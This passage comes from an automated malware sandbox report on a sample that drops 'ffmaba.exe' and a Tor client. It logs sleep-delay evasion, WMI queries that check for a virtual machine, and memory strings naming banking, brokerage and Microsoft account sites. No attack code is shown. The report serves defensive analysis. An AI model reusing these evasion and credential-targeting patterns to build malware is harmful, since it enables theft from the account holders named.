                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 668
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9321
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9532
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeAPI coverage: 0.2 %
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 6160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 7684Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 6101 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 3646 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe TID: 7804Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -32281802128991695s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599891s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599782s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599657s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599532s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599422s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599313s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599188s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599063s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598938s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598813s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598703s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598594s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598469s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594096s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -593969s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1100Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1632Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6096Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 4764Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1856Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599782
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599657
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599532
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599063
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598938
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598813
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594096
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 593969
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemut-cq
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware`,cq
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: tor-real.exe, 00000019.00000002.4506475775.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2580669352.0000000003B85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4hQpFIf62HGFSgFPpC9pEuCY6ucujJf6Ftb2YTL+QvzBv4j65ro8p+uPnTzWQTQb
                Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: tor-real.exe, 00000019.00000003.2603770446.0000000003B67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
                Source: yt7dW9nyJK.exe, 00000004.00000002.4503685491.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4567101003.0000000008BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: veew:vmware
                Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: dsMWdeSqEmuJJIBpLr
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: tor-real.exe, 00000019.00000003.2513085213.0000000003B5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IZLX8lNvJiqIXS9BPkTdcJG0LMdDTHgfSJsXP51YJFT3GhWGMmVcI3q8+JfiRaM+
                Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: olC9lOqWPHK88HFMTEhwNWbT7gvrCu9S6t7YKiU0tCTrnSyoqh98BYJMKYPcVyVq6QH7wK0MITIdm5LCOdc8NQiQgosgZCikoR0VE9b14hr9AdPDqvax914xQbRvHHUserControlSystem.Windows.FormsChRU3suQZG888ENdRHUITypeEditorSystem.Drawing.DesignSystem.DrawinghJoBVTCJOFB8KbEMJfEnumqtabICjUM1yu2dXfPRE2SGhQYFowq1a4bCowl34GXL5vNW82bgMJ5lzBNpsa1J6aFfpJ9agJMulticastDelegateS38nbElj16DUH4JmgowrOlfvWiRFUqlEadjbuJQbHFNDeqVG9J5p7Jmc5DtE4OAi1XadTaq6GKDwRgE783WxvWp6FfIdB8fkUaD5p3FJwdr3aZIq4n2jNC2gHBRbtvuBlyJUPig7ystNtlItEHTD4YcGU3B3X7aUWPkHxckGKt1a6kPhq2xyog03IpvEUnRkmsThhpEnmb0GDRg1JwvqHtkcPZKoYg6xYJvGADoYIbA72EcoBeHj6l5IrCVuXw0UjhJAXcjuqEfet4MwQVESrnfkCGOjDZTXfDQQcMfUTS02PsiElBFN1VQYyPPFDDqqNNDPtg4MpPgqZnG1LR7LKxEI838eQgK6UTnMQjfwuU2UPPwPJLQsRsHPypoXGlh9FSyLkQpmpfLuvQhmVZmG0JZtewW47VKoO1A80rKYoteG0JemVRyoiielLoCsXvUvwVY22DMKX09nMNQYPNewbTihrPRL4pCKUA63i3fDdWaVOOc8904gwBAbM77CvDHNk3Wt4nnsOAh82OGR39MMrSWBIeuAxKq2AjIGjbHLJ2ABcydsMWdeSqEmuJJIBpLrnhYoc49lXKnNh5aiCvwhBZyOnDtx0yAShZ25EventArgsKfMYoKipy60SihV2CuApplicationExceptionLjKFJcGnQbFpADmDEjwShyhrkNG0qWJND3SvfKuFCZdsOPruwLDaUCG3L0NIMHLFjsoLjt29NbgqbDZfxTd3FhSpvTFfQAINhFBC6dNiNZwgFY2mwLsU9abgqviB9BUjMKYsbxiOGkaFTe6VnKKY7Tt52faTCddFBgnlGFpdxwrdyqFjguXlRandomzdH4f3pZmi7p2yCYxrFNiqGIzN6YouuO6eE2ExpandableObjectConverterSystem.ComponentModelMoLs8m78ESt4YD6gORWbY96JQ77r098fZP3507seoCK27qJBYxrPOCBskwqc7bO7TnM3ZX08JehS<Module>{C4C74D2E-796D-4738-A2CB-2385446279D3}z8kGPD7V8d7hxfofvLDR8Ws5h7LgtEIaV5HSC1lhfqZ77uv0qpfoRgUYT<PrivateImplementationDetails>{562DFE12-60DD-4FBB-98FE-0EEC878F2D71}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: tor-real.exe, 00000019.00000002.4504777802.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                Source: ffmaba.exe, 0000000B.00000002.2262375658.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2255035504.0000000002590000.00000004.08000000.00040000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2262375658.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2332127774.0000000003BB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemu'T
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: nde7wqEmuJ
                Source: tor-real.exe, 00000019.00000002.4508537239.00000000059E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4Z7HsFL3Y/X5CqfwtTJvNNbhGfSyZTok9JiO/lGEurgMLddZED/0WVWtcZ/YAH7k
